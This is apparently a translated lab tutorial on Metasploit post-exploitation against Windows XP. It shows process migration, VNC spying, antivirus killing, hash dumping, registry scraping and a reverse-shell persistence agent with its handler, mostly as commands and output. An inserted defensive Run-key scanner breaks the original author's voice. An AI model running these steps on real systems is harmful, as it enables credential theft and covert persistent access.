Common Metasploit post-exploitation scripts: remote monitoring


Introduction

This article describes in detail the post-exploitation scripts commonly used in Metasploit once a meterpreter session has been obtained, what each one does, and how it is run in practice.

Test environment   Description       IP
Host               Kali 2020         192.168.1.113
Target             Windows XP SP3    192.168.1.106

First, the ms08_067 exploit module is used against the target; for the detailed steps see
Exploiting ms08_067: obtaining a meterpreter session with MSF

msf6 exploit(windows/smb/ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 192.168.1.113:4444 
[*] 192.168.1.106:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 192.168.1.106
[*] Meterpreter session 1 opened (192.168.1.113:4444 -> 192.168.1.106:1216) at 2021-06-05 22:43:39 +0800

meterpreter > 

1. Process migration

The purpose of migrating is to make control of the target stealthier and more durable: exploiting a vulnerability leaves a process on the target that is easy to spot, so the session is moved into a less conspicuous process.

meterpreter > run post/windows/manage/migrate

[*] Running module against WINXP-1
[*] Current server process: svchost.exe (1156)
[*] Spawning notepad.exe process to migrate into
[*] Spoofing PPID 0
[*] Migrating into 3716
[+] Successfully migrated into process 3716

2. Starting a remote VNC session

An interactive remote graphical tool can be run on the compromised system (it lets you watch everything that happens on the target's screen).

meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.1.113 LPORT=4545
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\WINDOWS\TEMP\QuUcZHEDZcd.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.1.113:4545...
meterpreter > Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name "winxp-1"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding

[Figure 1: target desktop]
[Figure 2: VNC service]

Possible problems
The target's desktop may be locked, making it inaccessible; the screen_unlock script can be used to unlock it.

meterpreter > run screen_unlock

3. Killing antivirus software

Antivirus software can block the attack process.

meterpreter > run killav

[!] Meterpreter scripts are deprecated. Try post/windows/manage/killav.
[!] Example: run post/windows/manage/killav OPTION=value [...]
[*] Killing Antivirus services on the target...
[*] Killing off cmd.exe...

4. Dumping system password hashes

meterpreter > run hashdump

[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY a6cc07586ea276fb6bb10b5e6fbc07e5...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...

5. Viewing all traffic on the target

To see all network traffic on the target system, run the packet recorder script; every captured packet is saved in .pcap format and can be opened in Wireshark. The procedure is as follows.

meterpreter > run packetrecorder -i 1

[!] Meterpreter scripts are deprecated. Try post/windows/manage/rpcapd_start.
[!] Example: run post/windows/manage/rpcapd_start OPTION=value [...]
[*] Starting Packet capture on interface 1
[+] Packet capture started
[*] Packets being saved in to /root/.msf4/logs/scripts/packetrecorder/WINXP-1_20210605.1818/WINXP-1_20210605.1818.cap
[*] Packet capture interval is 30 Seconds

6. Extracting system information

The scraper script extracts all system information: it collects usernames and passwords, downloads the entire registry, dumps password hashes, and so on.

meterpreter > run scraper
[*] New session on 192.168.1.106:445...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*]  Exporting HKCU
[*]  Downloading HKCU (C:\WINDOWS\TEMP\XoAUidOI.reg)
[*]  Cleaning HKCU
[*]  Exporting HKLM
[*]  Downloading HKLM (C:\WINDOWS\TEMP\nHtPKIjq.reg)
[*]  Cleaning HKLM
[*]  Exporting HKCC
[*]  Downloading HKCC (C:\WINDOWS\TEMP\FaWycKSv.reg)
[*]  Cleaning HKCC
[*]  Exporting HKCR
[*]  Downloading HKCR (C:\WINDOWS\TEMP\qKYvqXeA.reg)
[*]  Cleaning HKCR
[*]  Exporting HKU
[*]  Downloading HKU (C:\WINDOWS\TEMP\DnovcEeK.reg)
[*]  Cleaning HKU
[*] Completed processing on 192.168.1.106:445...

7. Persistence

meterpreter's persistence script injects a meterpreter agent so that the target reconnects to meterpreter after the system reboots.

meterpreter > run persistence -X -i 50 -p 443 -r 192.168.1.113

[!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.
[!] Example: run exploit/windows/local/persistence OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WINXP-1_20210605.2824/WINXP-1_20210605.2824.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.113 LPORT=443
[*] Persistent agent script is 99612 bytes long
[+] Persistent Script written to C:\WINDOWS\TEMP\VAfovf.vbs
[*] Executing script C:\WINDOWS\TEMP\VAfovf.vbs
[+] Agent executed with PID 3384
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\moOyPewJil
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\moOyPewJil
meterpreter > 
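The defender's counterpart to the persistence run above, as an added example that is not from the original post or from Metasploit: a small scanner over `reg query`-style output of the HKLM Run key that flags entries resembling the one just installed (a script launched from a TEMP directory under a random-looking value name). It assumes the autorun value data is the plain path to the .vbs, as the output above suggests, and the registry listing is a constructed sample.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample in the shape of `reg query HKLM\...\Run` output. The second
# entry reuses the value name and .vbs path from the persistence run above; the
# other two are made-up benign entries for contrast.
SAMPLE_RUN_KEY = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    VMware Tools    REG_SZ    "C:\Program Files\VMware\VMware Tools\VMwareTray.exe"
    moOyPewJil    REG_SZ    C:\WINDOWS\TEMP\VAfovf.vbs
    ctfmon    REG_SZ    C:\WINDOWS\system32\ctfmon.exe
"""

TEMP_DIRS = {"temp", "tmp"}
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".bat", ".cmd", ".ps1", ".hta"}
ENTRY_RE = re.compile(r"^\s+(.+?)\s+REG_(?:EXPAND_)?SZ\s+(.+?)\s*$")

def parse_run_key(text):
    """Return (value_name, value_data) pairs from reg-query style output."""
    return [(m.group(1), m.group(2)) for m in map(ENTRY_RE.match, text.splitlines()) if m]

def looks_random(name):
    """Letters only, 8+ chars, mixed case after the first letter (e.g. 'moOyPewJil')."""
    return (name.isalpha() and len(name) >= 8
            and any(c.isupper() for c in name[1:]) and any(c.islower() for c in name))

def assess(name, value):
    """List the reasons an autorun entry deserves a closer look (empty = unremarkable)."""
    # The program path is the quoted token if present, otherwise the whole value.
    path = PureWindowsPath(value[1:].split('"', 1)[0] if value.startswith('"') else value)
    reasons = []
    if any(part.lower() in TEMP_DIRS for part in path.parent.parts):
        reasons.append("runs from a temp directory")
    if path.suffix.lower() in SCRIPT_EXTS:
        reasons.append("script payload (%s)" % path.suffix.lower())
    if looks_random(name):
        reasons.append("random-looking value name")
    return reasons

def scan_run_key(text):
    """Map each suspicious value name to its list of reasons."""
    findings = {}
    for name, value in parse_run_key(text):
        reasons = assess(name, value)
        if reasons:
            findings[name] = reasons
    return findings
```

Calling `scan_run_key(SAMPLE_RUN_KEY)` reports only the moOyPewJil entry, with all three reasons; the same heuristics apply to the per-user Run keys and to the paths the VNC agent and scraper dropped under C:\WINDOWS\TEMP.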

After the agent has been injected, use a handler to listen for the callback.

msf6 exploit(windows/smb/ms08_067_netapi) > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lport 443
lport => 443
msf6 exploit(multi/handler) > set lhost 192.168.1.113
lhost => 192.168.1.113

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.113    yes       The listen address (an interface may be specified)
   LPORT     443              yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.113:443 

8. Listing more scripts

Type run and press the TAB key.

meterpreter > run 
Display all 531 possibilities? (y or n)
run arp_scanner
run autoroute
run checkvm
run credcollect
run domain_list_gen
run dumplinks
run duplicate
run enum_chrome
run enum_firefox
run enum_logged_on_users
run enum_powershell_env
run enum_putty
run enum_shares
run enum_vmware
run event_manager
......

Post-exploitation scripts simplify gathering further information once a meterpreter session has been obtained. Besides the scripts, several post-exploitation commands are also very useful; see Metasploit post-exploitation commands explained in full detail.


Summary

This article gave a brief introduction to the post-exploitation scripts commonly used in Metasploit after obtaining a meterpreter session, and to how they are run in practice. It is intended for learning purposes only.

Origin blog.csdn.net/qq_19623861/article/details/117607371